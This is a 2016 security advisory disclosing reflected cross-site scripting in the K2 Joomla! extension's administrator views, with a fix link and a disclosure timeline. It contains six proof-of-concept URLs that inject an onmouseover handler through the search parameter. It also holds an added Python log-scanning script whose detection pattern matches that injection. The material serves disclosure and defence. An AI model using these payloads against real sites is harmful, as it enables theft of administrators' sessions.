================================================================
K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting
================================================================

Information
--------------------
Name: K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting
Affected Software: K2
Affected Versions: < 2.7.1
Vendor Homepage: https://getk2.org/
                 http://extensions.joomla.org/extension/k2
Vulnerability Type: Reflected Cross Site Scripting
Severity: Medium
CVE: n/a

Product
--------------------
K2 is a Joomla! content construction extension; it allows editing content through the Joomla administration panel and the website.

Description
--------------------
The administrator panel of K2 suffers from multiple reflected cross site scripting vulnerabilities. An attacker could trick an administrator into clicking a malicious URL to steal their session cookie, or redirect them to a malicious site that serves further attacks (e.g. exploits against their browser). This XSS only affects administrators, so the range of attacks is limited, but it is still a risk.
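An administrator who wants to know whether the kind of URL described above was ever requested against their site can scan the web-server access log for the affected K2 administrator views. The following script is an added example, not part of the advisory or of K2: it assumes combined-format access-log lines (Apache/nginx style) and runs over constructed sample entries embedded in the code.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory). The second
# line carries the attribute-breakout pattern the advisory describes; the third
# is a front-end request and must not be flagged by this check.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Aug/2016:10:01:12 +0000] "GET /administrator/index.php?option=com_k2&view=items&search=joomla HTTP/1.1" 200 5120
203.0.113.9 - - [04/Aug/2016:10:02:40 +0000] "GET /administrator/index.php?option=com_k2&view=comments&search=%22%20onmouseover%3D%22alert(document.domain)%22%2F%3E HTTP/1.1" 200 5204
203.0.113.9 - - [04/Aug/2016:10:03:02 +0000] "GET /index.php?option=com_k2&view=itemlist&task=search&searchword=%22onload%3D HTTP/1.1" 200 8800
"""

# The six administrator views listed in the advisory's proof of concept.
AFFECTED_VIEWS = {"comments", "categories", "users", "extrafields", "items", "tags"}

# client ip, timestamp and request target of a combined-format log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# A quote followed by an on*= event handler, or a tag opener, inside the
# reflected value is what turns the search box attribute into script execution.
BREAKOUT_RE = re.compile(r'["\']\s*on\w+\s*=|<\s*/?\w', re.IGNORECASE)


def find_k2_search_xss(log_text):
    """Return (client_ip, timestamp, view, decoded_search) for each K2 admin
    request whose search parameter contains an attribute-breakout pattern."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/administrator/index.php"):
            continue
        q = parse_qs(parts.query)  # parse_qs already percent-decodes values
        if q.get("option", [""])[0] != "com_k2":
            continue
        view = q.get("view", [""])[0]
        search = q.get("search", [""])[0]
        if view in AFFECTED_VIEWS and BREAKOUT_RE.search(search):
            hits.append((ip, ts, view, search))
    return hits


if __name__ == "__main__":
    for hit in find_k2_search_xss(SAMPLE_LOG):
        print("possible K2 admin XSS attempt:", hit)
```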
Source code fixed:
https://github.com/getk2/k2/commit/c78f929dd3fcd4c55ba614ef8e789b944c30dc8d

Proof of Concept
----------------
PoC: http://localhost/administrator/index.php?option=com_k2&view=comments&search=" onmouseover="alert(document.domain)"/>
PoC: http://localhost/administrator/index.php?option=com_k2&view=categories&search=" onmouseover="alert(document.domain)"/>
PoC: http://localhost/administrator/index.php?option=com_k2&view=users&search=" onmouseover="alert(document.domain)"/>
PoC: http://localhost/administrator/index.php?option=com_k2&view=extrafields&search=" onmouseover="alert(document.domain)"/>
PoC: http://localhost/administrator/index.php?option=com_k2&view=items&search=" onmouseover="alert(document.domain)"/>
PoC: http://localhost/administrator/index.php?option=com_k2&view=tags&search=" onmouseover="alert(document.domain)"/>

Solution
--------------------
Update to the latest release (2.7.1).

More info:
https://getk2.org/blog/2571-k2-v271-released
https://vel.joomla.org/resolved/1858-k2-2-7-0-xss-cross-site-scripting

Advisory Timeline
--------------------
26/07/2016 - Informed the vendor about the issue.
26/07/2016 - Vendor answers me and tries to persuade me that the XSS is not a vulnerability. He said: "Just because you can run a piece of JS somewhere doesn't mean it's a security issue." WTF
28/07/2016 - Informed Joomla VEL about the issue.
29/07/2016 - Joomla VEL confirmed and wrote to me that the vendor will fix it.
29/07/2016 - Vendor confirms the vulnerability to me. LOL
04/08/2016 - Vendor fixed it in the latest release.
04/08/2016 - Public disclosure.

Definitely, sometimes full disclosure is better than responsible disclosure.

Credits & Authors
--------------------
Manuel Mancera (@sinkmanu)

Disclaimer
--------------------
All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage.
Therefore A2Secure shall not be liable for any direct or indirect damages that might be caused by using this information.